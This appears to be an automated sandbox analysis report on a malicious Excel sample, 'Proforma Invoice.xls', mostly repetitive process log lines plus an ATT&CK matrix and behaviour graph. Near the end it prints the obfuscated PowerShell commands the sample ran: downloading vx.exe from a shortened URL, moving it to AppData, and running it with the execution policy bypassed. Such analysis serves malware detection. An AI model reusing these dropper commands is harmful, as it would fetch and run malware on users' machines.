Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 0000000B.00000002.2161490285.00000000003D7000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policyShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 320373 Sample: Proforma Invoice.xls Startdate: 19/11/2020 Architecture: WINDOWS Score: 92 28 Antivirus detection for URL or domain 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->32 34 6 other signatures 2->34 7 EXCEL.EXE 85 30 2->7         started        process3 signatures4 36 Obfuscated command line found 7->36 38 Document exploit detected (process start blacklist hit) 7->38 10 cmd.exe 7->10         started        13 cmd.exe 7->13         started        15 cmd.exe 7->15         started        process5 signatures6 40 Obfuscated command line found 10->40 17 powershell.exe 16 9 10->17         started        20 powershell.exe 7 13->20         started        22 powershell.exe 7 15->22         started        process7 dnsIp8 24 cutt.ly 104.22.0.232, 443, 49165 CLOUDFLARENETUS United States 17->24 26 shopphongtinh.com 202.92.6.10, 443, 49167, 49168 VNPT-AS-VNVNPTCorpVN Viet Nam 17->26

Screenshots

Thumbnails

